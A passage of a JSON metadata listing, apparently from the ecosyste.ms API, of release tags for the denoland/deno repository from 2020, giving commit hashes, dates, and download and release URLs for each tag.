62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v